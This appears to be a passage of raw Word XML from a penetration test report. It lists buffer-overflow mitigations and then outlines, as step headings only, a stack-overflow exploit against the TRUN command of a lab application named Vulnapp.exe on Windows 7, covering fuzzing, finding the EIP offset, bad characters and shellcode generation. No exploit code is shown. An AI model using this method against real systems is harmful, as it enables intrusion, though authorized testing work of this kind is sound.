      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDDDD4" w14:textId="309D5024" w:rsidR="00153167" w:rsidRDefault="00153167" w:rsidP="00153167">
      <w:r>
        <w:t xml:space="preserve">To increase </w:t>
      </w:r>
      <w:r w:rsidR="00F07EF3">
        <w:t>security posture and prevent Buffer Overflows</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:t xml:space="preserve"> in Enterprises</w:t>
      </w:r>
      <w:r>
        <w:t>, Adelaja recommends the following mitigations and/or remediations be performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CC12D" w14:textId="61055F04" w:rsidR="00CA57FA" w:rsidRPr="00CA57FA" w:rsidRDefault="00153167" w:rsidP="00CA57FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00153167">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement Secure </w:t>
      </w:r>
      <w:r w:rsidR="00F07EF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Development </w:t>
      </w:r>
      <w:r w:rsidRPr="00153167">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r w:rsidRPr="00153167">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>evelopers of C</w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">++ and </w:t>
      </w:r>
      <w:r w:rsidRPr="00153167">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">C applications should </w:t>
      </w:r>
      <w:r w:rsidR="00F07EF3">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">include regular testing </w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">in pre and post deployment phases of software development </w:t>
      </w:r>
      <w:r w:rsidR="00F07EF3">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">to detect and fix stack and heap buffer overflows. </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>use intrusion detection and prevention systems</w:t>
      </w:r>
      <w:r w:rsidR="00CA57FA">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252862AF" w14:textId="77A739F3" w:rsidR="00F07EF3" w:rsidRDefault="00F07EF3" w:rsidP="00153167">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07EF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>void standard library functions that are not bounds-checked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00153167">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00153167">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">uch as </w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D" w:rsidRPr="00153167">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r w:rsidRPr="00153167">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, scanf and</w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> gets</w:t>
      </w:r>
      <w:r w:rsidR="00CA57FA">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E258CF" w14:textId="25DCE0E4" w:rsidR="00CA57FA" w:rsidRDefault="00CA57FA" w:rsidP="00153167">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA57FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permissions Audit of System Files</w:t>
      </w:r>
      <w:r>
        <w:t>. Perform</w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">baseline and scheduled audits of permissions to system files </w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ensure those </w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r>
        <w:t>files follow best security practices. Avoid service accounts owning sensitive</w:t>
      </w:r>
      <w:r w:rsidR="002752F8">
        <w:t xml:space="preserve"> system files that control local user access</w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:t xml:space="preserve"> as m</w:t>
      </w:r>
      <w:r w:rsidR="002752F8">
        <w:t>isconfigurations with permissions can be leveraged to gain full administrative access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61376C13" w14:textId="4CEB5DE9" w:rsidR="00153167" w:rsidRPr="00EA0FE0" w:rsidRDefault="00F07EF3" w:rsidP="00153167">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Enforced bounds-checking at Run time.</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D" w:rsidRPr="009E3B7D">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ddress space layout randomization</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> randomizes </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">the positions of </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>system executables</w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>stacks, heaps, and libraries in memory</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. This increases the difficulty </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>for an attacker to locate</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> them for exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">There is also the </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Structured Exception Handling Overwrite Protection,</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">blocks malicious code from attacking </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>system that manages hardware and software exceptions in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54910482" w14:textId="7BDAD45B" w:rsidR="00CA57FA" w:rsidRDefault="00F07EF3" w:rsidP="00CA57FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Use of Executable Space Protection. </w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ark areas </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">of memory as executable or non-executable, preventing attackers from running </w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> overflow code in some </w:t>
      </w:r>
      <w:r w:rsidR="00CA57FA" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>regions</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FE0" w:rsidRPr="00EA0FE0">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511AEE8" w14:textId="021F1197" w:rsidR="009E3B7D" w:rsidRPr="009E3B7D" w:rsidRDefault="009E3B7D" w:rsidP="009E3B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Automatic Protection At Language Level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D1742" w14:textId="200D7413" w:rsidR="00CA57FA" w:rsidRDefault="00CA57FA" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4E1CDC" w14:textId="7ADD1620" w:rsidR="002752F8" w:rsidRDefault="002752F8" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002752F8">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SEVERITY SCALE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA6B9CC" w14:textId="77777777" w:rsidR="002752F8" w:rsidRPr="002752F8" w:rsidRDefault="002752F8" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5180DDB9" w14:textId="2D6FDB2D" w:rsidR="002752F8" w:rsidRDefault="002752F8" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002752F8">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37381AF9" wp14:editId="53594BD5">
            <wp:extent cx="6660426" cy="31813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95541" cy="3198123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B5A8FB" w14:textId="2D327771" w:rsidR="00CA57FA" w:rsidRDefault="00CA57FA" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041CE39A" w14:textId="63542B3D" w:rsidR="002752F8" w:rsidRDefault="002752F8" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0BA804" w14:textId="6D3967A9" w:rsidR="002752F8" w:rsidRDefault="002752F8" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4A9FCD" w14:textId="1FE15A69" w:rsidR="002752F8" w:rsidRDefault="002752F8" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235626F1" w14:textId="3B20B941" w:rsidR="002752F8" w:rsidRDefault="002752F8" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716FB3F3" w14:textId="24A8DF0C" w:rsidR="002752F8" w:rsidRDefault="00420339" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420339">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D819D5B" w14:textId="707EAFA1" w:rsidR="00420339" w:rsidRDefault="00420339" w:rsidP="00CA57FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4724B231" w14:textId="226D8000" w:rsidR="00420339" w:rsidRDefault="00420339" w:rsidP="00CA57FA">
      <w:r w:rsidRPr="00420339">
        <w:t xml:space="preserve">During the exploitation phase, Adelaja </w:t>
      </w:r>
      <w:r>
        <w:t>will attempt to exploit a buffer Overflow attack within the windows 7 operating system using the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD4405D" w14:textId="7F38C257" w:rsidR="00420339" w:rsidRDefault="00420339" w:rsidP="00420339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing </w:t>
      </w:r>
      <w:r w:rsidR="004D11C1">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>to check vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCA018" w14:textId="521E24C5" w:rsidR="00420339" w:rsidRDefault="004D11C1" w:rsidP="00420339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>Generating A Pattern To find The Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F75CD55" w14:textId="58DA4710" w:rsidR="00420339" w:rsidRDefault="004D11C1" w:rsidP="00420339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>Overwriting</w:t>
      </w:r>
      <w:r w:rsidR="004D6526">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and Controlling</w:t>
      </w:r>
      <w:r w:rsidR="00420339">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5985E017" w14:textId="32BE075C" w:rsidR="00420339" w:rsidRDefault="00420339" w:rsidP="00420339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>Identify Bad Characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D2352" w14:textId="2B4D1304" w:rsidR="00420339" w:rsidRDefault="004D11C1" w:rsidP="00420339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>Identifying The Right Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF57D2" w14:textId="4F010EE0" w:rsidR="004D11C1" w:rsidRDefault="004D11C1" w:rsidP="00420339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>Generating The Shell Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A49538" w14:textId="029EDBC9" w:rsidR="004D11C1" w:rsidRDefault="004D11C1" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23625416" w14:textId="5DB1C116" w:rsidR="004D11C1" w:rsidRDefault="004D11C1" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>The end goal for the tester is to attempt to penetrate the target system gaining as much access privilege as possible. Adelaja will stay within the scope that was determined during pre-engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07495797" w14:textId="23B1F33B" w:rsidR="004D11C1" w:rsidRDefault="004D11C1" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCCDAD3" w14:textId="0D469BDE" w:rsidR="004D11C1" w:rsidRDefault="004D11C1" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1328">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1.Fuzzing To Check Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D64DA4" w14:textId="1EFC78F4" w:rsidR="005D1328" w:rsidRDefault="005D1328" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Before proceeding to develop the exploit. The application is checked to find any vulnerable injection points unable to handle large amounts of data causing the application to crash. The TRUN command on Vulnapp.exe is known to be vulnerable </w:t>
      </w:r>
      <w:r w:rsidR="00E34B94" w:rsidRPr="00E34B94">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>and the python script below was developed to attack this specific command</w:t>
      </w:r>
      <w:r w:rsidR="00E34B94">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [Figure 1.1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8EC13" w14:textId="0F458107" w:rsidR="00E34B94" w:rsidRDefault="00E34B94" w:rsidP="004D11C1">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DD1DD2" w14:textId="77777777" w:rsidR="00E34B94" w:rsidRDefault="00E34B94" w:rsidP="004A7613">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="756B3C3D" wp14:editId="6378E7E6">
            <wp:extent cx="4955358"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158289" cy="3093500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873A123" w14:textId="00A09323" w:rsidR="00E34B94" w:rsidRPr="00E34B94" w:rsidRDefault="00E34B94" w:rsidP="00E34B94">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc64889312"/>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.1: </w:t>
